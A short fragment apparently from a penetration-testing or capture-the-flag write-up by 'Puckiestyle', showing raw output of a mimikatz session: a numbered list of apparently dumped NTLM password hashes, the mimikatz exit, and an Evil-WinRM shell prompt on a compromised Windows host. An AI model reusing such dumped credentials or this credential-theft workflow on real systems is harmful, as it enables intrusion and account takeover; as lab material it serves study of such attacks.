d4c7554fe1beb0ed712f50cfec470471 24 8df495fe69cdce409b9f04ea04289b9e 25 40788044be982310920cc0740687fefd 26 db7f66f1f1a8f46274d20cfdda5b6e1c 27 d70226ec52f1ef198c2e1e955a1da9b6 28 abdd681f875a9b3f3a50b36e51692a2c 29 dcd140a2ce2bf70fed7ac0e2b60d0dee mimikatz(commandline) # exit Bye! *Evil-WinRM* PS C:\programdata>
Author :Puckiestyle